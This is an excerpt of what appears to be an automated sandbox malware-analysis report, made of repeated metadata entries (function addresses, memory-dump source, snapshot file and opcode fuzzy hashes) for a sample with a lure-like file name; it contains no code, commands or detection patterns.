                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6b311a59e0ba9fc2e08b6c4d19312a54c5c37e804a057bb8f916f525deea2fc4
                                                                                                                                                                                                                          • Instruction ID: 74fac088823f73c3d3bccaa0a96ae545308c4ca70b86ca6213c0bc96db954d16
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b311a59e0ba9fc2e08b6c4d19312a54c5c37e804a057bb8f916f525deea2fc4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5D1C074E003188FDB54DFA9C991B9DBBB2BF89300F5081A9D408AB365DB359E86CF51
                                                                                                                                                                                                                          Function 38C87E98 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b641995ec1321a907ba06f958d290d79c9e1698dfcd2bbfed0ea94bb2138fd56
                                                                                                                                                                                                                          • Instruction ID: 499ccd5828b7e7275a2049cf2641343d76d5664b24357de11aede94b08973acc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b641995ec1321a907ba06f958d290d79c9e1698dfcd2bbfed0ea94bb2138fd56
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66D1BF74E003188FDB54DFA5C991B9DBBB2BF89300F6081A9D408AB365DB359E85CF51
                                                                                                                                                                                                                          Function 38C8EC90 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 478ac85ccfee4dec5ea4c4ecedfd9b1fb9e76e0197469db40080f89366f6c329
                                                                                                                                                                                                                          • Instruction ID: 3a2aa2a60c5be29d7c535aca6944121ccc1f7af8a4b5b7393630cef8aa7b1354
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 478ac85ccfee4dec5ea4c4ecedfd9b1fb9e76e0197469db40080f89366f6c329
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55D1B174E003188FDB54DFA5C951B9DBBB2BF89300F6081A9D408AB3A5DB355E86CF51
                                                                                                                                                                                                                          Function 38C8D4A8 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 3ea051a9920b9c31d0052dae196fdbc42dfa803829005308dc760bac22c6b402
                                                                                                                                                                                                                          • Instruction ID: fecf636ef8d6683e7da49ded57177ace8fbd90d5864579d63c3621134e1b55e0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ea051a9920b9c31d0052dae196fdbc42dfa803829005308dc760bac22c6b402
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9D1D174E013188FDB54DFA9C991B9DBBB2BF89300F5081AAD408AB365DB359E85CF50
                                                                                                                                                                                                                          Function 38C8A9A0 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 9768b5b9ed6f6ba4ab9876230b8b7cd2967dbba43aaa3b5bcbc0eb87739b2c26
                                                                                                                                                                                                                          • Instruction ID: d5c936f1e4e160d80ecb9d948e8da8e3d1b1f0ae588f27f93102a6f65f640c7e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9768b5b9ed6f6ba4ab9876230b8b7cd2967dbba43aaa3b5bcbc0eb87739b2c26
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3BD1C174E003188FDB54DFA9C941B9DBBB2BF89300F6081A9D408AB365DB359E86CF51
                                                                                                                                                                                                                          Function 38C891B8 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: fa5e09f71ec8bb2f34ff8bb96a73b312d5f360df0cd4da7663f80f215368b8ff
                                                                                                                                                                                                                          • Instruction ID: eb39160631cdc02c2d6552fd5ae8116c2a44eea0c6c9cc59bda212193a952680
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa5e09f71ec8bb2f34ff8bb96a73b312d5f360df0cd4da7663f80f215368b8ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBD1C074E003188FDB54DFA5C991B9DBBB2BF89300F1081A9D408AB365DB359E85CF51
                                                                                                                                                                                                                          Function 38C866B0 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d785ed2982af9aec4f877a4aba085ea53bdab51c102861869a79dd9d46ccbb6f
                                                                                                                                                                                                                          • Instruction ID: b402b4d9cd0a952b74cce25d824a69ed29fd5682377888698f4953399d6575c3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d785ed2982af9aec4f877a4aba085ea53bdab51c102861869a79dd9d46ccbb6f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81D1C074E003188FDB54DFA5C955B9DBBB2BF89300F1081A9D408AB3A5DB359E85CF51
                                                                                                                                                                                                                          Function 38C89B48 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c7c3c6ca9a5402c68920cca0377a6e11f23bf12835bd95dcf7628e48b7e92354
                                                                                                                                                                                                                          • Instruction ID: 00c1906baa4dcfb77ac513f22a5b3db378d00b36b10e544f0b212fe104572958
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7c3c6ca9a5402c68920cca0377a6e11f23bf12835bd95dcf7628e48b7e92354
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40D1C074E003188FDB54DFA9C991B9DBBB2BF89300F2081A9D408AB365DB359E85CF50
                                                                                                                                                                                                                          Function 38C87040 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: bbf3bbf0c9f18580f3d9e8fc54060f12e13eb00e55d8b3e47d4d2cc37a2ec46d
                                                                                                                                                                                                                          • Instruction ID: 6fac07f99fe4634a4104dd058f18aeae3b79b97c8bf82ae587d7ef311770eb0b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbf3bbf0c9f18580f3d9e8fc54060f12e13eb00e55d8b3e47d4d2cc37a2ec46d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3D1C174E003288FDB54DFA9C991B9DBBB2BF89300F1081A9D408AB365DB359E85CF51
                                                                                                                                                                                                                          Function 38C8F158 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 0d6ca3e6074f7287895ffc18f8ad1d7f8087366f5bd44fb8bdaf697fff794722
                                                                                                                                                                                                                          • Instruction ID: f61ccc788d37dd459f4ec6972bae1e63f7da65c3ccd79f96ec96a4fae781e21a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d6ca3e6074f7287895ffc18f8ad1d7f8087366f5bd44fb8bdaf697fff794722
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7D1B074E003188FDB54DFA9C991B9DBBB2BF89300F6081A9D408AB365DB359E85CF51
                                                                                                                                                                                                                          Function 38C8C650 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 81d22b55468790f9fccf0c05db2e9822d004294747995f241cdddd352378127a
                                                                                                                                                                                                                          • Instruction ID: c2fe8cb4fbf63255a92e53e6dd12ef72dcd051a127e487bbff4d4106ea86b863
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81d22b55468790f9fccf0c05db2e9822d004294747995f241cdddd352378127a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07D1BF74E002188FDB54DFA9C991B9DBBF2BF89300F5081A9D408AB3A5DB359E85CF51
                                                                                                                                                                                                                          Function 38C8AE68 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f5afec7e07d89e20da7ed0ad03353df2cbc39ac78c635e74053eafe88221ae6e
                                                                                                                                                                                                                          • Instruction ID: 5bd8ed0bbce960333860f8d30a3c8b50affa995183fb023ad825a78af44aec60
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5afec7e07d89e20da7ed0ad03353df2cbc39ac78c635e74053eafe88221ae6e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69D1C174E003188FDB54DFA5C991B9DBBB2BF89300F6081A9D408AB365DB359E86CF51
                                                                                                                                                                                                                          Function 38C88360 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ef6c3ccf595df7a203d1301fbbafedb8b84e227a574bd9536c7a4ce4332a55b7
                                                                                                                                                                                                                          • Instruction ID: 38dca5735cf5f1760292c8cc136d5e72ac5be54848d23186f76cda6d8c0bbb94
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef6c3ccf595df7a203d1301fbbafedb8b84e227a574bd9536c7a4ce4332a55b7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31D1BF78E012188FDB54DFA9C991B9DBBB2FF89300F5081A9D408AB365DB359E85CF50
                                                                                                                                                                                                                          Function 38C86B78 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 650c4b0de25100be682bea09a12e23d4f8a052bbe85673a6844b4e3f8a5f8ac4
                                                                                                                                                                                                                          • Instruction ID: a34e34791e273bcecf0d532d04bb137c3024fdbab641b63c3e7926e6493eab66
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 650c4b0de25100be682bea09a12e23d4f8a052bbe85673a6844b4e3f8a5f8ac4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5D1D074E003188FDB54DFA5C995B9DBBB2BF89300F2081A9D408AB365DB359E85CF50
                                                                                                                                                                                                                          Function 38C87508 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f1985250e8a6cc0ffd7b564e5fdd767961fa4e753ad7d3ffe3e219065ca8b82f
                                                                                                                                                                                                                          • Instruction ID: 23d9353f1581d655c6d0811cd4520593d006b26a1ec974d4674c88232f830e2a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1985250e8a6cc0ffd7b564e5fdd767961fa4e753ad7d3ffe3e219065ca8b82f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7ED1D174E013288FDB54DFA9C991B9DBBB2BF89300F2081A9D408AB364DB355E85CF50
                                                                                                                                                                                                                          Function 38C8E300 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 7a6062463bea261988b6b755d4b31b8af409b3098ee764f6376d59de818bbc66
                                                                                                                                                                                                                          • Instruction ID: 48e6f8c3b743152cc4e2ec7ea71b2a08bd72fb42e2b59ae446ca7ff963ab840b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a6062463bea261988b6b755d4b31b8af409b3098ee764f6376d59de818bbc66
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9ED1C174E003188FDB54DFA9C991B9DBBB2BF89300F6081A9D408AB365DB359E85CF51
                                                                                                                                                                                                                          Function 38C8CB18 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 80f06a99aa4b4479a470a5748a62aa29ba7c193cfbd5f4778efa32e3a0170f27
                                                                                                                                                                                                                          • Instruction ID: 22c2e43d073bf6b53132ff1969ba3d0e8ddfff781b63fed475d9daf4b41bf360
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80f06a99aa4b4479a470a5748a62aa29ba7c193cfbd5f4778efa32e3a0170f27
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4ED1AE74E002188FDB54DFA5C991B9DBBF2BF89300F5081AAD408AB365DB359E86CF51
                                                                                                                                                                                                                          Function 38C8A010 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: df7af34a0531066d0e492bd65d35486897240b76a44d3bc81a98c354ef5d11ea
                                                                                                                                                                                                                          • Instruction ID: b754ed58c7891a89b3d9c84b996e994366b7f40cf539a718858e1ea3ca1ab564
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df7af34a0531066d0e492bd65d35486897240b76a44d3bc81a98c354ef5d11ea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FD1C174E003188FDB54DFA5C951B9DBBB2BF89300F6081A9D408AB365DB359E85CF51
                                                                                                                                                                                                                          Function 38C88828 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: cb7f3db7dcaaf2d1929f8673b37a76c32ffb2affd47c8f4456fcc189a674c451
                                                                                                                                                                                                                          • Instruction ID: 9ef9f0137817bfb21e31eb7a4e569dbb1ecef3228419da068bb166a262b2a31d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb7f3db7dcaaf2d1929f8673b37a76c32ffb2affd47c8f4456fcc189a674c451
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1D1BE74E013188FDB54DFA9C991B9DBBB2BF89300F1081A9D408AB365DB359E86CF51
                                                                                                                                                                                                                          Function 38C8F620 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c245aa1c8ead0975ee3f42a25403ffa77c0d983f36aa1f5ccd7c25cfd57979f3
                                                                                                                                                                                                                          • Instruction ID: dde1c1132029172db6db708b88830c6221fcf8e49e16e8aae6a707a8bda99c6c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c245aa1c8ead0975ee3f42a25403ffa77c0d983f36aa1f5ccd7c25cfd57979f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFD1B174E003188FDB54DFA9C951B9DBBB2BF89300F6081A9D408AB365DB359E86CF51
                                                                                                                                                                                                                          Function 38C8DE38 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 65539b57612cec36cda4e0cdfabc2f921240bae18c16ea2299f35dba053c35f3
                                                                                                                                                                                                                          • Instruction ID: 1f3a3f93cae242248caf30f19103988baf69f68c9498f5dace6362799e749e70
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65539b57612cec36cda4e0cdfabc2f921240bae18c16ea2299f35dba053c35f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BD1C174E013188FDB54DFA5C991B9DBBB2BF89300F1081A9D408AB365DB359E85CF51
                                                                                                                                                                                                                          Function 38C8B330 Relevance: .3, Instructions: 292COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ac88cef5235c82c9be1e18e9e519ed342a68e8a65848aba70ee3695d6ad84111
                                                                                                                                                                                                                          • Instruction ID: 1847d4963715f4b2df8adfc414ec37e68fc61dbfbfa0aa62de3e3c6236162626
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac88cef5235c82c9be1e18e9e519ed342a68e8a65848aba70ee3695d6ad84111
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82D1C174E003188FDB54DFA5C991B9DBBB2BF89300F6081A9D408AB365DB359E86CF51
                                                                                                                                                                                                                          Function 38C836C8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38c80000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ba102bc58a5b0b146b7f662d109d2c21148c531b5e0a2454e88721f546996c14
                                                                                                                                                                                                                          • Instruction ID: d77bab1b1f7b06c3872e7e7830bfc7ceb60155c95c71457dfae2bd2d6cdcab7d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba102bc58a5b0b146b7f662d109d2c21148c531b5e0a2454e88721f546996c14
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31D1BF78E00218CFDB55DFA5C950B9DBBB2FF89300F6081A9D848AB364DB355A86CF51
                                                                                                                                                                                                                          Function 38C804D0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972859573.0000000038C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38C80000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
